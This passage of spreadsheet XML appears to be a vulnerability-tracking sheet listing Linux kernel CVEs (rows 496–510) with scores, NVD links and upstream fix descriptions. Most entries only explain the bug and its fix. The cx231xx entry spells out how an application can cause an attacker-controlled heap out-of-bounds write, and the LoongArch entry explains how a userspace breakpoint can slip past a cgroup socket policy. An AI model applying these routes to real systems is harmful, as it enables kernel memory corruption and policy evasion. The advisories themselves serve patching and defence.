          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr"/>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: i2c: ov7740: fix use-after-destroy in remove
The ov7740_remove() function had a severe teardown order bug where it
destroyed the driver's mutex before freeing the V4L2 control handler
which relies on that mutex, leading to a use-after-destroy kernel panic.
Furthermore, the driver explicitly called v4l2_ctrl_handler_free() and
mutex_destroy() sequentially, but then called ov7740_free_controls()
which invokes both of them a second time, resulting in a double-free.
This patch fixes the issue by unregistering the subdevice first, and
relying exclusively on ov7740_free_controls() to safely tear down the
mutex and control handler in the correct order.</t>
        </is>
      </c>
      <c r="S496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89887</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89888</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr"/>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: i2c: ov02a10: fix endpoint parsing use-after-free
The ov02a10_check_hwcfg() function calls fwnode_handle_put(ep)
immediately after allocating and parsing the endpoint. However, it
subsequently calls fwnode_property_read_u32() using the same 'ep'
handle, leading to a potential use-after-free.
Additionally, reading the optional 'ovti,mipi-clock-voltage' property
used to overwrite the 'ret' variable. If the property was missing,
'ret' would become negative, and this failure code would be incorrectly
returned at the end of the function, causing probe to fail entirely.
Fix the use-after-free by moving fwnode_property_read_u32() before
the endpoint is parsed and freed. Avoid the error leak by not
assigning the result of fwnode_property_read_u32() to 'ret'.</t>
        </is>
      </c>
      <c r="S497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89888</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89890</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr"/>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: go7007: defer the ALSA v4l2 put until card release
go7007_snd_init() already takes a v4l2_device reference for the ALSA
side, but go7007_snd_remove() drops it immediately after calling
snd_card_free_when_closed().
That is too early when a userspace process still has the capture PCM open.
The ALSA card and its PCM callbacks remain alive until the last file is
closed, so the release path can still reach struct go7007 through
pcm-&gt;private_data and call go7007_snd_hw_free() after the V4L2 release path
has freed the object.
Move the matching v4l2_device_put() to the ALSA card private_free callback
so the existing ALSA reference covers the whole deferred card lifetime.</t>
        </is>
      </c>
      <c r="S498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89890</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89893</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="inlineStr"/>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr"/>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cx23885: cancel NetUP CI work before teardown
netup_ci_exit() frees a netup_ci_state while its work item,
netup_read_ci_status(), may still be pending or running on the system
workqueue. The worker obtains the state with container_of() and
dereferences it, so it must not outlive the state.
netup_ci_init() queues the initial status read, and CI GPIO interrupts
subsequently queue the same work from netup_ci_slot_status(). During
remove, cx23885_finidev() calls free_irq() before the CI device is
unregistered. free_irq() prevents further IRQ handlers from running,
but does not drain work queued previously, so the worker can run after
netup_ci_exit() frees the state.
Call cancel_work_sync() before dvb_ca_en50221_release() and kfree().
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89893</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89894</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr"/>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cx231xx: reject geometry changes while the VBI queue is busy
vidioc_s_fmt_vid_cap() and vidioc_s_std() change the device-wide
dev-&gt;width / dev-&gt;norm but only refuse the change when the *video* queue
(dev-&gt;vidq) is busy. The VBI queue (dev-&gt;vbiq) shares that same geometry:
cx231xx_init_vbi_isoc() latches dma_q-&gt;lines_per_field from dev-&gt;norm,
the VBI videobuf2 plane is sized from dev-&gt;width / dev-&gt;norm in
vbi_queue_setup() and vbi_buf_prepare(), and cx231xx_do_vbi_copy() then
recomputes the destination offset from the *live* dev-&gt;width and the
latched lines_per_field on every URB completion:
	offset = lines_completed * (dev-&gt;width &lt;&lt; 1) + ...;
	if (dma_q-&gt;current_field == 2)
		offset += dev-&gt;width * 2 * dma_q-&gt;lines_per_field;
	memcpy(plane + offset, p_buffer, lencopy);
Because the VBI node shares video_ioctl_ops with the video node, an
application can size a small VBI plane (REQBUFS/QBUF with a small width,
or with the NTSC standard), then enlarge dev-&gt;width (or switch dev-&gt;norm
to PAL) through the video node while the VBI stream is running -- the
change is allowed because only dev-&gt;vidq is checked -- and let the device
deliver a field-2 VBI payload. cx231xx_do_vbi_copy() now computes the
offset with the larger geometry and memcpy()s past the end of the smaller
plane that was already allocated, a heap out-of-bounds write whose offset
is attacker-chosen and whose contents come from the device. The
per-field guard in cx231xx_copy_vbi_line() does not help: it bounds the
copy against the latched lines_per_field, not the plane's real capacity,
and vb2 does not re-run buf_prepare() for an already prepared buffer.
Refuse the format/standard change when the VBI queue is busy as well, so
the geometry cannot change underneath an allocated VBI buffer.</t>
        </is>
      </c>
      <c r="S500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89894</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89899</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr"/>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cec: disable delayed work before freeing an interrupted transmit
cec_transmit_msg_fh() drops adap-&gt;lock to wait for a blocking transmit in
wait_for_completion_killable(). If that wait is interrupted by a signal,
cancel_delayed_work_sync() can run before the CEC kthread arms the reply
timeout via schedule_delayed_work(&amp;data-&gt;work) in cec_transmit_done_ts().
The work is then armed after the cancel, and the data is freed with its
delayed_work still pending:
  ODEBUG: free active (active state 0) object: ... hint: cec_wait_timeout
Use disable_delayed_work_sync(): it cancels the work and disables it, so
the later schedule_delayed_work() becomes a no-op and the work cannot be
re-armed. The data is freed right after, so it need not be re-enabled.</t>
        </is>
      </c>
      <c r="S501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89899</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89902</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr"/>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: Avoid preempt count underflow without probe
LoongArch uses break 11 for the breakpoint placed after an instruction
that Kprobes executes out of line. Since userspace can issue the same
break instruction, do_bp() can reach kprobe_singlestep_handler() when
there is no current probe.
The handler actually returns false in this case, but it first calls
preempt_enable_no_resched(). The corresponding preempt_disable() is done
by kprobe_breakpoint_handler() on a real Kprobe hit, so it has not run
here. As a result, an ordinary userspace breakpoint (code 11) underflows
the current task's preempt count.
This also makes in_interrupt() return true until the task schedules. One
visible consequence is the socket cgroup attribution: cgroup_sk_alloc()
treats the allocation as interrupt context and assigns the socket to the
root cgroup. A socket opened from the SIGTRAP handler can then avoid a
BPF_CGROUP_INET_SOCK_CREATE policy attached to the task's own cgroup.
Return as soon as kprobe_running() reports no active probe.
The same check has appeared in [PATCH v10 2/4] of the original LoongArch
Kprobes series, but was dropped before the feature reached mainline.</t>
        </is>
      </c>
      <c r="S502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89902</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89903</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr"/>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: Do not save/restore percpu base register in rethook trampoline
The rethook trampoline saves $r21 ($u0), the percpu base, into its frame
at entry and restores it at exit. Inbetween rethook_trampoline_handler()
may schedule via preempt_enable_notrace().
If the task migrates to another CPU, the frame's $r21 holds the old
CPU's percpu base, and restoring it poisons $r21 on the new CPU. Until
the next user-&gt;kernel transition heals $r21, all this_cpu_*() accesses
(runqueues, RCU per-CPU data, timer tick programming, FPU ownership)
hit the wrong CPU's percpu area.
Under kretprobe-heavy preemptible load this can corrupt scheduler and
timer state: scheduling-while-atomic splats, wrong-CPU RCU warnings,
WARN_ON_ONCE(rq != this_rq()) in nohz_balance_exit_idle(), and CPUs
parking in the idle loop with the constant timer never re-armed (hard
lockup). Reproduces on a Loongson-3A6000 with kretprobes on VFS paths
plus heavy file churn (OS install / unsquashfs).
By convention $r21 always holds the current CPU's percpu base in kernel
mode: SAVE_SOME() at exception entry reloads it only when coming from
user mode, and RESTORE_SOME() restores it only when returning to user
mode; the context-switch path never writes it. Therefore the live $r21
at trampoline exit is already correct, and nothing inbetween can change
it legitimately (kernel C code cannot write a global register variable).
The same flaw existed even in the pre-rethook kretprobe trampoline since
v6.3; it was carried over when rethook replaced it. Drop both the save
and the restore here. Drop the restore is enough to solve the issue, and
drop the save is to keep the code tidy and no need to clear it.</t>
        </is>
      </c>
      <c r="S503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89903</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89906</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr"/>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: BPF: Refactor jump offset calculation in tail call
The old macro-based jmp_offset calculation derives the jump distance
from a stale prior-pass code stride, which can lead to wrong branch
offsets and soft lockups under extra JIT passes.
Fix this by calculating the offset directly on the absolute target:
"ctx-&gt;offset[insn + 1] - ctx-&gt;idx".
To avoid a false 16-bit range check abort during size estimation, add
a "ctx-&gt;image == NULL" guard to inject a safe dummy offset.</t>
        </is>
      </c>
      <c r="S504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89906</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89919</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr"/>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: keyop: use mmu_lock to read gmap-&gt;asce
Every other dat_* consumer in this file (kvm_s390_get_skeys,
set_skeys, get_cmma_bits, set_cmma_bits, MEM_CLR_CMMA,
kvm_s390_fixup_prefix, kvm_test_age_gfn, kvm_age_gfn) reads
kvm-&gt;arch.gmap-&gt;asce *inside* the mmu_lock read-side. keyop is the only
outlier.
gmap-&gt;asce is mutated under write_lock(mmu_lock) by gmap_set_limit()
and keyop might use a stale asce value for walking as KVM_S390_KEYOP
and KVM_S390_VM_MEM_LIMIT_SIZE can run concurrently. This can result
in memory corruption.</t>
        </is>
      </c>
      <c r="S505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89919</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89920</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr"/>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Fix memory corruption by not reinjecting CK machine checks
Channel-subsystem damage machine checks are for the host channel
subsystem. The guest channel subsystem is emulated in the userspace VMM.
There is no point in forwarding such machine checks into the guest.
This also simplifies the machine check reinjection and avoids kfree of a
stack variable as reported by sashiko.  There might be still machine
checks that have the ck bit set with another bit (like instruction
damage), mask out the CK bit in s390_backup_mcck_info(), like the CP and
ED bits already are.</t>
        </is>
      </c>
      <c r="S506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89920</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89922</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr"/>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Take srcu when importing watchpoint data
__import_wp_info() backs up the original guest memory contents of a
watchpoint with read_guest_abs(), which is kvm_read_guest() and therefore
resolves the memslot via __kvm_memslots(). That requires kvm-&gt;srcu (or
kvm-&gt;slots_lock) to be held, otherwise a concurrent memslot update can
free the memslots array under us once its SRCU grace period has elapsed.
As this is not fast path, following lock ordering (mutex first, then
srcu) take the big hammer and hold the srcu for the full import.</t>
        </is>
      </c>
      <c r="S507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89922</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89938</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr"/>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: chemical: atlas-sensor: use iio_trigger_poll_nested() to fix remove UAF
The atlas driver requests its hardware data-ready IRQ with
devm_request_threaded_irq(); its threaded handler queues an irq_work,
atlas_work_handler(), that calls iio_trigger_poll(data-&gt;trig).
The IRQ is devm-managed, so free_irq() runs from the devres unwind after
atlas_remove() returns without flushing that irq_work.  Once a buffer is
enabled, conversion-complete IRQs keep firing and queueing it; a pending
irq_work can therefore run after the unwind has freed atlas_data/indio_dev
and the trigger, when atlas_work_handler() derives the atlas_data pointer
via container_of() and dereferences data-&gt;trig, a use-after-free.
Call iio_trigger_poll_nested() directly from the threaded handler instead
of bouncing through irq_work.  free_irq() then drains the threaded handler,
closing the window; other iio drivers with a threaded data-ready IRQ do the
same (e.g. bmi270).
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89938</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89940</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr"/>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: buffer: Tie IIO dma fence lock lifetime to the fence
The `iio_dma_fence` implementation currently uses a lock embedded in the
`iio_dmabuf_priv`. But the `iio_dma_fence` can outlive the
`iio_dmabuf_priv`, which can cause a use-after-free.
Tie the lifetime of the lock to the lifetime of the fence by embedding them
in the same struct.
We can't just hold a reference to the `iio_dmabuf_priv` from the
`iio_dma_fence` since `iio_buffer_dmabuf_release()` might sleep and the
fence release callback is not allowed to sleep.
Note that the `dma_fence` framework now has an internal lock that gets used
when the passing `NULL` for `lock` in `dma_fence_init()`, but in order to
allow this patch to be backportable use an external lock.</t>
        </is>
      </c>
      <c r="S509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89940</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
